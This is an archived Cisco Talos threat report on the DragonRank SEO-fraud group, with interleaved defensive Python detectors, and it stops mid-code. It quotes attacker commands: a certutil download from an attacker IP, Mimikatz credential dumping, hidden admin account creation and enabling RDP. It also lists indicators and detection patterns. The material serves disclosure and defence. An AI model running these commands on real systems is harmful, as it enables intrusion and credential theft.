{
	"id": "97001758-9382-4e40-8f40-9cfffda41ce5",
	"created_at": "2026-04-06T00:12:54.179468Z",
	"updated_at": "2026-04-10T03:28:05.498619Z",
	"deleted_at": null,
	"sha1_hash": "aed0ac6f04dadb7af3e3186d6a8173a3bd372ec1",
	"title": "DragonRank, a Chinese-speaking SEO manipulator service provider",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2103022,
	"plain_text": "DragonRank, a Chinese-speaking SEO manipulator service provider\r\nBy Joey Chen\r\nPublished: 2024-09-10 · Archived: 2026-04-02 11:07:40 UTC\r\nTuesday, September 10, 2024 00:00\r\nKey Takeaways\r\n- Cisco Talos is disclosing a new threat called “DragonRank” that primarily targets countries in Asia and a few in Europe, operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation.\r\n- DragonRank exploits targets’ web application services to deploy a web shell, then uses it to collect system information, launch malware such as PlugX and BadIIS, and run various credential-harvesting utilities.\r\n- Their PlugX uses the familiar DLL sideloading technique and, in addition, abuses the Windows Structured Exception Handling (SEH) mechanism so that the legitimate binary loads the PlugX loader without raising suspicion.\r\n- We have confirmed that more than 35 IIS servers across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, the Netherlands and China, were compromised and had the BadIIS malware deployed in this campaign.\r\n- Talos also discovered DragonRank’s commercial website, business model and instant messaging accounts. We used this information to assess with medium to high confidence that the DragonRank hacking group is operated by a Simplified Chinese-speaking actor.\r\nVictimology: Countries, verticals and what is happening\r\nTalos has recently uncovered a cluster of activity we’re calling “DragonRank” distributed across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, the Netherlands and China. They have cast a wide net in terms of industries, encompassing sectors such as jewelry, media, research services, healthcare, video and television production, manufacturing, transportation, religious and spiritual organizations, IT services, international affairs, agriculture, sports, and even niche markets like feng shui. This broad spectrum of targets indicates a wide-reaching and non-targeted approach to their operations.\r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 1 of 18\r\nThese activities employ tools and tactics, techniques, and procedures (TTPs) typically linked to Simplified Chinese-speaking hacking groups. The hacking group’s primary goal is to compromise Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute its scam websites to unsuspecting users.\r\nThe threat actor engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website’s ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company’s online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices.\r\nThe actor takes the compromised websites and promotes them, effectively turning these sites into platforms for scam operations. The scam websites we observed in this campaign use keywords related to porn and sex, and the keyword configuration data served by the command and control (C2) servers has been translated into multiple languages. Talos has confirmed that more than 35 IIS servers were compromised and acted as a conduit for this attack. The following example pictures show the configuration data from the C2 server and the infected scam websites we observed in search engine results.
\r\nWho they are\r\nThe findings revealed that DragonRank is actively engaging in black hat SEO practices to promote their business online, thereby boosting their clients’ internet visibility by unethical means. However, we discovered that the DragonRank hacking group operates differently from traditional black hat SEO cybercrime groups. Those groups usually compromise as many website servers as possible to manipulate search engine traffic, whereas DragonRank emphasizes lateral movement and privilege escalation. Their objective is to infiltrate additional servers within the target’s network and maintain control over them. We assess that they are relatively new to the black hat SEO industry, and that they previously functioned more as a hacking group specializing in targeted attacks or penetration testing.\r\nBased on DragonRank’s objective and the C2 servers extracted from their PlugX malware, we used relevant keywords to conduct a search engine investigation. For instance, searching \"tttseo.com\" on Google showed numerous instances of DragonRank’s advertisements, which had been inserted across various legitimate websites. The content of these ads consistently centered on black hat SEO services. By changing our IP address to appear as if we were accessing the internet from another country (we used Japan as an example), we conducted keyword searches which confirmed that DragonRank has disseminated their targeted keywords globally. Additionally, we noticed that the actor is offering services for bulk posting on social media platforms.\r\nWe found the DragonRank commercial website, which provides Chinese and English versions of their business model. According to their introduction, their business includes white hat SEO and black hat SEO advertising channels, including cross-site ranking, single-site ranking, parasite ranking, extrapolation ranking, and search result dominance. DragonRank’s activity also covers over 200 countries and regions worldwide and can support large volumes of industry-wide advertising.\r\nTalos also observed DragonRank sharing their contact information on Telegram and the QQ instant messaging application, which allows users to contact them and conduct underground business trades. This allowed us to collect information and uncover several business models and cybercrime evidence about the origin of the attacker. First, the account name is “天天推工作室” (roughly “Daily Push Studio”) and the icon reads “校长工作室” (“Principal Studio”); although the two names differ, both describe a studio, which suggests they likely have the same motivations as any other traditional business. They also included a cautionary note in their account biography stating to \"make sure of the transaction confirmation address, as we will not be held accountable for any incorrect payments!\"\r\nThis disclaimer gives us high confidence that DragonRank conducts their cybercriminal activities by receiving payments from customers. These adversaries also offer seemingly quality customer service, tailoring promotional plans to best fit their clients’ needs. Customers can submit the keywords and websites they wish to promote, and DragonRank develops a strategy suited to these specifications. 
The group also specializes in targeting promotions to specific countries and languages, ensuring a customized and comprehensive approach to online marketing.\r\nAlthough we are not entirely certain of the attacker’s location, given that the Telegram phone number is from Thailand, Talos assesses with medium to high confidence that the DragonRank hacking group is a Simplified Chinese-speaking actor. The creators of the website refer to China as the “mainland,” which further bolsters our confidence. This actor also operates PlugX as its backdoor, a well-known backdoor used by multiple Chinese threat actors. Perhaps most importantly, the group uses Simplified Chinese on its promoted website, and its customer service uses Simplified Chinese to speak with customers.\r\nThe attack chain of this campaign\r\nIn this campaign, the initial entry point leveraged by the DragonRank hacking group is vulnerabilities in web application services such as phpMyAdmin, WordPress, or similar web applications. Once DragonRank obtains the ability to execute remote code or upload files on the targeted site, they deploy a web shell. This grants them control over the compromised server, marking their initial foothold. The web shell used in this campaign is identified as the open-source ASPXSpy web shell; it was detected at the following locations:\r\nC:\\phpMyAdmin\\shell.aspx\r\nC:\\AWStats\\wwwroot\\shell.aspx\r\nAfter dropping the web shell, the group was seen using it to collect system information and launch malware such as PlugX and BadIIS, as well as to run credential-harvesting and privilege escalation utilities including Mimikatz, PrintNotifyPotato, BadPotato and GodPotato. The commands used by the attacker to gather system details and dump credentials are listed below with the MITRE ATT\u0026CK technique the post assigns to each.\r\nMITRE      Command\r\nT1016      cmd /c cd /d C:\\phpMyAdmin\"\u0026netstat -an | find ESTABLISHED\u0026echo [S]\u0026cd\u0026echo [E]\r\nT1057      cmd /c cd /d C:\\phpMyAdmin\"\u0026tasklist\u0026echo [S]\u0026cd\u0026echo [E]\r\nT1033      cmd /c cd /d C:\\phpMyAdmin\"\u0026whoami\u0026echo [S]\u0026cd\u0026echo [E]\r\nT1069.001  net localgroup administrators\r\nT1082      cmd /c cd /d C:/Windows/SysWOW64/inetsrv/\u0026systeminfo 2\u003e\u00261\r\nT1555      cmd /c cd /d C:/Windows/SysWOW64/inetsrv/\u0026C:/ProgramData/pp888.tmp whoami 2\u003e\u00261\r\nT1555      cmd /c cd /d C:/Windows/SysWOW64/inetsrv/\u0026C:/ProgramData/BadPotato.exe whoami 2\u003e\u00261\r\nT1555      cmd /c cd /d C:/Windows/SysWOW64/inetsrv/\u0026C:/ProgramData/GodPotato-NET4.exe -cmd whoami 2\u003e\u00261\r\nNote that BadPotato and GodPotato are local privilege escalation tools (they abuse the SeImpersonatePrivilege held by the IIS worker process to obtain SYSTEM), so running whoami through them tests for SYSTEM-level execution ahead of the credential-dumping step; T1068 (Exploitation for Privilege Escalation) describes those invocations more precisely than T1555.\r\nDragonRank also breaches additional Windows IIS servers in the target’s network, either by deploying web shells or by logging in over Remote Desktop with acquired credentials. After accessing the other Windows IIS servers, the adversaries use a web shell or Remote Desktop Protocol (RDP) to install PlugX, BadIIS, credential-dumping tools, and a user-cloning utility, with the aim of maintaining a low profile and ensuring persistence within the network. On one of the compromised servers we also observed DragonRank using the user-cloning utility to copy an administrator’s permissions to a guest account, elevating that guest account to administrator privileges on the compromised system, and then executing the credential-dumping tool. The full attack chain diagram is shown below.
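\r\nThe command sequences above (and the re-engagement sequence shown later in the post) are the kind of process-creation telemetry a defender can alert on. The following Python is an added example written for this page, not code from Talos or from the post: it runs a small rule set over constructed process-creation events modeled on those commands. The events, the rule names and the mapping of the Potato tools to T1068 are this example’s own choices; paths are written with forward slashes, as several commands in the post already are, and the detector folds backslashes to forward slashes so the same patterns match real Windows telemetry.\r\n
```python
import re

BS = chr(92)  # a single backslash, used to fold Windows paths

def norm(text):
    # Real Windows telemetry writes paths with backslashes; several commands in the post
    # use forward slashes. Fold both to forward slashes so one pattern set covers them.
    return text.replace(BS, '/')

def basename(path):
    return norm(path).rsplit('/', 1)[-1].lower()

# Processes a web worker should never spawn on a production IIS host
WEB_SERVER_CHILDREN = {'cmd.exe', 'powershell.exe', 'rundll32.exe', 'certutil.exe'}

# (rule name, technique, pattern applied to the normalized command line)
RULES = [
    ('recon', 'T1033/T1016/T1057/T1082',
     re.compile(r'(?:^|[^a-z])(?:whoami|netstat -an|tasklist|systeminfo)(?:$|[^a-z])', re.I)),
    # the post tags the Potato runs T1555; the tools themselves are local privilege escalation
    ('potato_lpe', 'T1068',
     re.compile(r'(?:bad|god|printnotify)potato|[^ ]+ -cmd whoami', re.I)),
    ('mimikatz_args', 'T1003.001',
     re.compile(r'privilege::debug|sekurlsa::logonpasswords', re.I)),
    ('rdp_toggle', 'T1021.001',
     re.compile(r'reg add .*fDenyTSConnections .*/d 0', re.I)),
    ('hidden_admin_account', 'T1136.001',
     re.compile(r'net +user +[^ ]*[$] .*/add', re.I)),
    ('admin_group_add', 'T1098',
     re.compile(r'net +localgroup +administrators .*/add', re.I)),
    ('certutil_download', 'T1105',
     re.compile(r'certutil(?:.exe)? .*-urlcache .*https?://', re.I)),
    ('account_cleanup', 'T1070',
     re.compile(r'net +user +[^ ]+ +/del', re.I)),
]

def classify(parent_image, image, command_line):
    # Returns [(rule, technique), ...] for one process-creation event.
    hits = []
    if basename(parent_image) == 'w3wp.exe' and basename(image) in WEB_SERVER_CHILDREN:
        hits.append(('webshell_child', 'T1505.003'))
    line = norm(command_line)
    for name, technique, pattern in RULES:
        if pattern.search(line):
            hits.append((name, technique))
    return hits

def scan(events):
    # {event index: hits} for every event that triggered at least one rule
    report = {}
    for index, event in enumerate(events):
        hits = classify(*event)
        if hits:
            report[index] = hits
    return report

# Constructed sample events (parent image, image, command line) modeled on the commands
# in the post; not real telemetry.
W3WP = 'C:/Windows/System32/inetsrv/w3wp.exe'
CMD = 'C:/Windows/System32/cmd.exe'
EXPLORER = 'C:/Windows/explorer.exe'
SAMPLE_EVENTS = [
    (W3WP, CMD, 'cmd /c cd /d C:/phpMyAdmin&whoami&echo [S]&cd&echo [E]'),
    (W3WP, CMD, 'cmd /c cd /d C:/Windows/SysWOW64/inetsrv/&C:/ProgramData/GodPotato-NET4.exe -cmd whoami 2>&1'),
    (W3WP, 'C:/Windows/System32/certutil.exe',
     'certutil.exe -urlcache -split -f http://35.247.175[.]184:443/1.aspx C:/HostingSpaces/site/wwwroot/1.aspx'),
    (W3WP, 'C:/Windows/System32/rundll32.ex e'.replace(' ', ''), 'rundll32.exe privilege::debug sekurlsa::logonpasswords exit'),
    (W3WP, CMD, 'cmd /c reg add HKLM/SYSTEM/CurrentControlSet/Control/Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    (W3WP, CMD, 'cmd /c net user admins$ admin@123... /add'),
    (W3WP, CMD, 'cmd /c net localgroup administrators admins$ /add'),
    (W3WP, CMD, 'cmd /c net user admins$ /del'),
    (EXPLORER, CMD, 'cmd /c whoami'),  # an administrator at an interactive prompt: recon only
]

if __name__ == '__main__':
    for index, hits in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index][2][:60], hits)
```
Feed it w3wp.exe-parented process events from Sysmon Event ID 1 or Security event 4688; the parent check is what separates a web shell from an administrator typing whoami at an interactive prompt, as the last sample event shows.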
\r\nFive months after the initial breach, DragonRank re-engaged with one of the previously compromised IIS servers through a previously deployed web shell to verify its operational status and ensure the server still had the permissions required for their activities. The verification involved several steps: downloading a web shell onto the system, retrieving the host name and cached credentials (the rundll32.exe entry below carries Mimikatz command syntax), adding a hidden administrator account named “admins$”, enabling RDP (fDenyTSConnections set to 0) to facilitate remote control and disabling it again afterwards (set to 1), and finally covering their tracks by deleting the “admins$” account. The commands are listed below.\r\nMITRE      Command\r\nT1105      certutil.exe -urlcache -split -f http://35.247.175[.]184:443/1.aspx C:\\HostingSpaces\\[REDACTED]\\[REDACTED].co.th\\wwwroot\\1.aspx\r\nT1033      cmd /c whoami\r\nT1555      C:\\Windows\\System32\\rundll32.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"\r\nT1021.001  cmd /c reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nT1016      \"cmd\" /c \"cd /d \"c:/windows/system32/inetsrv/\"\u0026netstat -an\" 2\u003e\u00261\r\nT1136      cmd /c net user admins$ admin@123... /add\r\nT1098      cmd /c net localgroup administrators admins$ /add\r\nT1021.001  cmd /c reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f\r\nT1070      cmd /c net user admins$ /del\r\nMalware analysis\r\nPlugX\r\nPlugX serves as the primary backdoor used by this hacking group in this campaign. They used the DLL sideloading technique, abusing vulnerable legitimate binaries to start the PlugX loader, which is consistent with the method described in this report. 
We have outlined the execution flow of the PlugX malware based on our telemetry data and the payload discovered on VirusTotal.\r\nAlthough this PlugX relies on the same sideloading technique as previous PlugX loaders, there are a few significant modifications to the loader component in this campaign. The first concerns the loader’s use of a top-level exception filter (the \"TopLevelExceptionFilter\" function, part of the Windows Structured Exception Handling mechanism that receives exceptions no other handler has dealt with) to make the legitimate file load the PlugX loader. Because such a filter only runs when an unhandled exception is raised, the legitimate binary reaches the loader code through the operating system’s own exception dispatch rather than through a direct call; this doubles as error handling and obscures the control flow, making it harder for antivirus products and other security tools to spot the malicious behavior. The use of SEH by PlugX demonstrates the sophistication of the malware and helps it remain persistent and stealthy on a compromised system.\r\nWhen the PlugX loader has been sideloaded by the legitimate binary, it searches for the payload in three locations, in order. The first is the directory where the loader itself resides. The second is the system registry under \"HKEY_LOCAL_MACHINE\\SOFTWARE\\bINARy,\" where it looks for the value \"Acrobat.dxe.\" The third is the same path under \"HKEY_CURRENT_USER\\SOFTWARE\\bINARy,\" again checking for the value \"Acrobat.dxe.\" Once the payload is found in any of these locations, the loader reads it, decrypts it with a single-byte XOR using the key 0xD1, and injects it into a newly allocated memory block. The PlugX payload then connects to the C2 server and executes entirely in memory to stay under the radar.\r\nFurther, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. During this research we discovered that a similar PlugX loader with the same registry path, values and XOR key 0xD1 had been uploaded to VirusTotal. We used this loader instance to retrieve a few of the original archived files and their download sites. Despite differences in the archives’ initial upload source and the countries involved, the PlugX loader and its associated payload proved to be identical, with their hashes matching precisely.\r\nSHA256 | Download site | VT submit country\r\n046a03725df3104d02fa33c22e919cc73bed6fd6a905098e98c07f0f1b67fadb | https://admin1.tttseo[.]com/ht.zip | Taiwan\r\n785d92dc175cb6b7889f07aa2a65d6c99e59dc1bbc9edb8f5827668fd249fa2e | N/A | Hong Kong\r\nf748b210677a44597a724126a3d97173d97840b59d6deaf010c370657afc01f8 | http://ddos.tttseo[.]com/ddos/ddos.zip | China\r\nPlugX is a well-known remote access tool (RAT) equipped with modular plugins and property configurations that has been deployed by various Chinese-speaking cyber threat actors for more than ten years.\r\n
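\r\nBecause the payload is stored XORed with a single byte, it can be carved out of any blob (a registry value export, a file from the loader’s directory, a memory dump) without running the loader: the DOS stub string and the MZ and PE signatures survive the XOR in a predictable form. The following Python is an added example written for this page, not Talos code and not the loader’s own logic; the three-way search order is modeled as three mappings standing in for the loader directory and the two bINARy registry keys (on a live host winreg would read the latter), and the embedded PE image is a constructed sample.\r\n
```python
import struct

XOR_KEY = 0xD1   # single-byte key reported for this campaign
DOS_STUB = b'This program cannot be run in DOS mode'

def xor_bytes(data, key=XOR_KEY):
    # single-byte XOR is its own inverse, so this both encrypts and decrypts
    return bytes(b ^ key for b in data)

def looks_like_pe(data):
    # minimal sanity check: MZ magic, e_lfanew inside the buffer, PE signature there
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b'PE' + bytes(2)

def find_xored_pe(blob, key=XOR_KEY):
    # Scan an opaque blob for a PE image XORed with key: the DOS stub string XORed with
    # the same key is a distinctive 38-byte marker. Step back to where the MZ header
    # would be, decode from there and validate. Returns the decoded image or None.
    marker = xor_bytes(DOS_STUB, key)
    pos = blob.find(marker)
    while pos != -1:
        # the stub text normally starts at 0x4E; allow for slightly different stubs
        for delta in (0x4E, 0x4D, 0x4C, 0x50):
            start = pos - delta
            if start >= 0 and (blob[start] ^ key) == 0x4D and (blob[start + 1] ^ key) == 0x5A:
                candidate = xor_bytes(blob[start:], key)
                if looks_like_pe(candidate):
                    return candidate
        pos = blob.find(marker, pos + 1)
    return None

def locate_payload(loader_dir, hklm_binary, hkcu_binary, name='Acrobat.dxe'):
    # The search order the post describes: the loader's own directory, then the
    # HKLM SOFTWARE bINARy key, then the HKCU SOFTWARE bINARy key, each checked for
    # Acrobat.dxe. The three mappings stand in for a directory listing and two registry
    # keys (on a live host, winreg reads the latter); the first hit wins.
    for store in (loader_dir, hklm_binary, hkcu_binary):
        if name in store:
            return store[name]
    return None

def build_fake_pe():
    # constructed 256-byte image with a valid DOS header, stub text and PE signature
    image = bytearray(0x100)
    image[0:2] = b'MZ'
    struct.pack_into('<I', image, 0x3C, 0x80)
    image[0x4E:0x4E + len(DOS_STUB)] = DOS_STUB
    image[0x80:0x84] = b'PE' + bytes(2)
    return bytes(image)

def demo():
    # a loader directory without the payload, an HKLM value holding it XORed, and an
    # unrelated HKCU value: the HKLM copy is found and carves back to the original image
    original = build_fake_pe()
    stored = bytes(16) + xor_bytes(original) + bytes(8)
    found = locate_payload({}, {'Acrobat.dxe': stored}, {'Acrobat.dxe': b'decoy'})
    carved = find_xored_pe(found)
    return carved is not None and carved[:len(original)] == original

if __name__ == '__main__':
    print('carved payload matches:', demo())
```
The XORed marker is also a usable hunting signature on its own: the two bytes 0x9C 0x8B are what MZ becomes under key 0xD1, and the XORed stub string can be searched for in registry hive files and on disk without decoding anything first.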
The PlugX configuration in this campaign contains all the values and information needed to run the payload. We extracted all configuration fields and values from the pivot samples on VirusTotal. The fields contained in the PlugX configuration are:\r\n1. C2 Address: mail.tttseo[.]com:53\r\n2. Persistence Type: Service + Run Key\r\n3. Install Dir: %ALLUSERSPROFILE%\\Adobe\\Player\\\r\n4. Service Name: Microsoft Office Document Update Utility\r\n5. Service Disp: Microsoft Office Document Update Utility\r\n6. Service Desc: Microsoft Office Document Update Utility\r\n7. Registry hive: 02000080\r\n8. Registry key: Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n9. Registry value: MODU\r\n10. Injection: True\r\n11. Injection process: %windir%\\system32\\svchost.exe\r\n12. Injection process: %windir%\\system32\\winlogon.exe\r\n13. Injection process: %windir%\\system32\\LoginUI.exe\r\n14. Injection process: %windir%\\system32\\svchost.exe\r\n15. Injection process: %windir%\\system32\\rundll32.exe\r\n16. Injection process: %windir%\\system32\\dllhost.exe\r\n17. Injection process: %windir%\\system32\\msiexec.exe\r\n18. Online Pass: chinatongyi2022\r\n19. Memo: fish\r\n20. Mutex: Global\\MckZoZkywaEap\r\n21. Screenshots: False\r\n22. Screenshots params: 10 sec / Zoom 50 / 16 bits / Quality 50 / Keep 3 days\r\n23. Screenshots path: %AUTO%\\DSSM\\screen\r\nWe also discovered the same PlugX loader and payload in a file named \"ddos.zip,\" which is disguised as a tool for managing DDoS attacks. However, all the files within this archive are different variants of the PlugX loader. This supports our assessment that the hacking group may be new to the cybercrime industry, as they show little concern for maintaining a reputable facade. Additionally, the archive includes an application manual designed to lure users into executing the malware under the guise of operating a DDoS tool. The archive consists of two subfolders, one masquerading as a server-side control interface and the other as a client-side installation utility. Both folders contain different versions of the PlugX loader but the same PlugX payload. The first loader variant is identical to the one examined in this case, while the other uses a digitally signed driver to facilitate execution of the PlugX payload. The operational details of this second, driver-based variant are in line with the descriptions provided in this analysis. Additionally, the application manual and the folder names are in Simplified Chinese, leading us to conclude that this decoy is aimed at regions where Simplified Chinese is spoken.\r\nBadIIS\r\nTo manipulate search engine crawlers and hyperlink redirection, the threat actor deployed the previously seen BadIIS malware, which was presented at Black Hat USA 2021. We assess with medium confidence that the BadIIS observed in this campaign is associated with the entity referred to as Group 9 in the Black Hat presentation. The version of BadIIS we detected shares traits with the one described at the conference, including its configuration as an IIS proxy and its SEO fraud capabilities.\r\nGroup 9’s IIS proxy is used to relay C2 communications between infected hosts and their C2 server. This malware family can also commit SEO fraud by altering the HTTP responses that compromised IIS servers return to search engine crawlers. 
This allows attackers to manipulate search engine rankings, artificially inflating the SEO of specific third-party websites by exploiting the credibility of the sites hosted on the breached web server. While the behavior and tactics of the BadIIS malware are largely consistent, we noted a few distinctions that set the current variant apart from the Group 9 variant described at Black Hat:\r\nGroup 9 BadIIS: targets Chinese search engines, e.g. sogou, baidu, 360, etc.  |  This campaign: targets well-known search engines, e.g. google, yahoo, bingbot, etc.\r\nGroup 9 BadIIS: multiple URL paths, e.g. /zz.php, /zz1.php, /zk.php, /pq.php, /wh1.php, /zid.php, /xin.html, /zy.php  |  This campaign: only two URL paths, /zz1.php and /xx1.php\r\nWe then analyzed other available samples that share the execution sequence and filenames of the malicious activity observed in this campaign and that are possibly related to another campaign by the same actor. This research produced several important findings, detailed in turn in this section.\r\nOur initial observation is that the DragonRank hacking group tends to install BadIIS in particular file locations. For instance, they attempt to place BadIIS within directories named \"Kaspersky SDK,\" likely to evade scrutiny by blending in with security software. The file paths we observed are:\r\nC:/ProgramData/Kaspersky SDK/IISMODEx86.dll\r\nC:/ProgramData/Kaspersky SDK/IISMODEx64.dll\r\nC:/ProgramData/IISMODEx64.dll\r\nC:/ProgramData/IISMODEx86.dll\r\nAdditionally, Talos observed that the BadIIS samples contain Program Database (PDB) strings as well as compile timestamps. The BadIIS variants were compiled between April and August 2023. The PDB strings found in these samples are:\r\nC:\\Users\\Administrator\\Desktop\\dll\\Release\\HttpModRespDLLx64.pdb\r\nC:\\Users\\Administrator\\Desktop\\dll\\Release\\HttpModRespDLLx86.pdb\r\nC:\\Users\\Administrator\\Desktop\\HttpModRespDLL\\Release\\HttpModRespDLLx64.pdb\r\nC:\\Users\\Administrator\\Desktop\\HttpModRespDLL\\Release\\HttpModRespDLLx86.pdb\r\nC:\\Users\\Administrator\\Desktop\\HttpModRespDLL\\Release\\x64\\HttpModRespDLLx64.pdb\r\nBased on our analysis of these matching samples and telemetry from our endpoint agent, the execution sequence has two parts:\r\nExecute “1.bat”, a batch file to install BadIIS\r\nThe discovery of the \"1.bat\" script led us to a blog post that published the source code of the BadIIS malware. The post shared not only the source code and objectives of BadIIS but also a well-organized batch script that lets users install BadIIS on IIS servers. The batch script configures IIS to load the malicious BadIIS module: it uses the appcmd.exe utility to modify the IIS configuration and copies the BadIIS module files into the \"%windir%\\Microsoft.NET\\Framework64\" directory, then restarts the IIS services to apply the changes.\r\nTalos observed that the DragonRank hacking group added two commands to the \"1.bat\" install script, shown below. Our assessment is that the proxy functionality of BadIIS cannot handle compressed output, whether generated by scripts and executables (dynamic compression) or served from static files such as HTML, CSS, JavaScript and images (static compression). To relay communication between the compromised server and the C2 servers successfully, the threat actor disables both IIS dynamic and static compression. 
\r\nC:\\Windows\\system32\\inetsrv\\appcmd.exe set config /section:urlCompression /doStaticCompression:false\r\nC:\\Windows\\system32\\inetsrv\\appcmd.exe set config /section:urlCompression /doDynamicCompression:false\r\nOn one of the compromised servers in this campaign, we also observed the DragonRank hacking group use the following commands to change the file attributes of the BadIIS DLLs (archive, system, read-only, not-content-indexed and hidden) in an attempt to conceal the files and make them harder to find or modify:\r\nattrib +a +s +r +i +h C:\\Windows\\Microsoft.NET\\HttpResetModule.dll\r\nattrib +a +s +r +i +h C:\\Windows\\Microsoft.NET\\HttpResetModule64.dll\r\nMalicious IISMODEx86.dll/IISMODEx64.dll malware\r\nAnalysis of the malware’s signature shows similarities with the activities attributed to \"Group 9\" in the Black Hat USA 2021 talk. The \"Group 9\" malware carries out proxying and SEO fraud, consistent with the actions detailed in that report. However, the SEO fraud and proxy functions in this campaign differ slightly from Group 9’s BadIIS variant. The SEO fraud initialization still catches incoming HTTP requests whose User-Agent header matches a search engine crawler, but the crawler pattern is not identical to the one in the report. Below is the BadIIS search engine crawler pattern we observed in this campaign (the pattern as printed in the post is cut off after the last alternative shown):\r\n(MJ12bot|msnbot|Yahoo|bingbot|google|YandexBot|DotBot|exabot|ia_archiver|Teoma|AhrefsBot|SemrushBot|Speedy|yandex|LinkpadB\r\nThe proxy feature of BadIIS is configured to permit access to certain URL paths and to restrict specific file types based on their extensions. Once a request matches the BadIIS rules, BadIIS forwards the request to the C2 server using the “/zz1.php” URL path. 
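\r\nAn IIS module registered by 1.bat ends up in the globalModules section of applicationHost.config, and the two appcmd commands above leave urlCompression switched off; both are visible in the XML without running anything on the server. The following Python is an added example for this page, not Talos code: it audits a constructed applicationHost.config fragment against a baseline of expected native module names. The baseline, the registered module name HttpResetModule and the image paths are assumptions made for the example (a real baseline is the module list exported from a known-clean server of the same IIS build), and the sample writes paths with forward slashes, which the code also folds real backslash paths into.\r\n
```python
import xml.etree.ElementTree as ET

BS = chr(92)  # a single backslash

def norm(path):
    # applicationHost.config spells paths with backslashes; fold to forward slashes, lower-case
    return path.replace(BS, '/').lower()

INETSRV = '%windir%/system32/inetsrv/'

# Assumed baseline: the globalModules names exported from a known-clean server of the
# same IIS build. Only three entries are listed here to keep the sample short.
BASELINE = {'HttpLoggingModule', 'StaticCompressionModule', 'DynamicCompressionModule'}

def audit(config_xml, baseline):
    # Returns a list of (finding, subject, detail) tuples for a (fragment of an)
    # applicationHost.config: native modules absent from the baseline, native modules
    # whose image sits outside inetsrv, and urlCompression flags switched off.
    root = ET.fromstring(config_xml)
    findings = []
    modules = root.find('.//globalModules')
    for add in (modules.findall('add') if modules is not None else []):
        name = add.get('name', '')
        image = norm(add.get('image', ''))
        if name not in baseline:
            findings.append(('unknown_native_module', name, image))
        if not image.startswith(INETSRV):
            findings.append(('module_outside_inetsrv', name, image))
    compression = root.find('.//urlCompression')
    if compression is not None:
        for attr in ('doStaticCompression', 'doDynamicCompression'):
            if compression.get(attr, 'true').lower() == 'false':
                findings.append(('compression_disabled', attr, 'false'))
    return findings

# Constructed sample, not a real server's file: two stock modules, one module registered
# from the ProgramData path the post lists (its registered name is an assumption), and
# the urlCompression section as the two appcmd commands leave it.
SAMPLE_CONFIG = '''<configuration>
  <system.webServer>
    <globalModules>
      <add name='HttpLoggingModule' image='%windir%/System32/inetsrv/loghttp.dll' />
      <add name='StaticCompressionModule' image='%windir%/System32/inetsrv/compstat.dll' />
      <add name='HttpResetModule' image='C:/ProgramData/Kaspersky SDK/IISMODEx64.dll' />
    </globalModules>
    <urlCompression doStaticCompression='false' doDynamicCompression='false' />
  </system.webServer>
</configuration>'''

if __name__ == '__main__':
    for finding in audit(SAMPLE_CONFIG, BASELINE):
        print(*finding)
```
On a live server the same three checks can be run with appcmd itself (appcmd list module and appcmd list config /section:urlCompression); the value of doing it against the XML is that a copy of applicationHost.config can be pulled from a suspect host and reviewed offline. Files hidden with the attrib command above come back into view with attrib -s -h -r -i on the same path.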
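\r\nThe crawler pattern, the /zz1.php and /xx1.php C2 paths and the Googlebot impersonation together describe SEO cloaking: a crawler and a human visitor receive different responses for the same URL. The following Python is an added example for this page, not Talos code and not BadIIS itself: it reproduces the visible part of the crawler pattern (case-insensitive matching is an assumption), builds and parses the /xx1.php report URL whose parameters the next paragraph shows, and runs a cloaking check that compares what a crawler User-Agent and a browser User-Agent receive. The fetch callable is injected so the check runs offline against a constructed stand-in for a compromised server; point it at a real HTTP client to test a live site.\r\n
```python
import hashlib
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# The crawler alternation as printed in the post, which cuts off after LinkpadB; only the
# visible tokens are reproduced here. Case-insensitive matching is an assumption.
CRAWLER_RE = re.compile(
    r'(MJ12bot|msnbot|Yahoo|bingbot|google|YandexBot|DotBot|exabot|ia_archiver|'
    r'Teoma|AhrefsBot|SemrushBot|Speedy|yandex)', re.I)

C2_HOST = 'a.googie[.]pw'   # defanged, as in the post
GOOGLEBOT_UA = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
BROWSER_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36'

def is_crawler(user_agent):
    return CRAWLER_RE.search(user_agent) is not None

def c2_report_url(host, path):
    # shape of the /xx1.php report: host, reurl and domain, with the path left unescaped
    query = urlencode({'host': host, 'reurl': path, 'domain': host}, safe='/')
    return 'http://' + C2_HOST + '/xx1.php?' + query

def parse_c2_request(url):
    # Hunting helper for proxy or egress logs: recognise the two BadIIS C2 paths and pull
    # the victim host and path out of an /xx1.php report. Defanged hosts are refanged
    # first so that urlsplit does not mistake the brackets for an IPv6 literal.
    parts = urlsplit(url.replace('[.]', '.'))
    if parts.path not in ('/zz1.php', '/xx1.php'):
        return None
    query = parse_qs(parts.query)
    return {'c2': parts.netloc, 'path': parts.path,
            'victim_host': query.get('host', [None])[0],
            'victim_path': query.get('reurl', [None])[0]}

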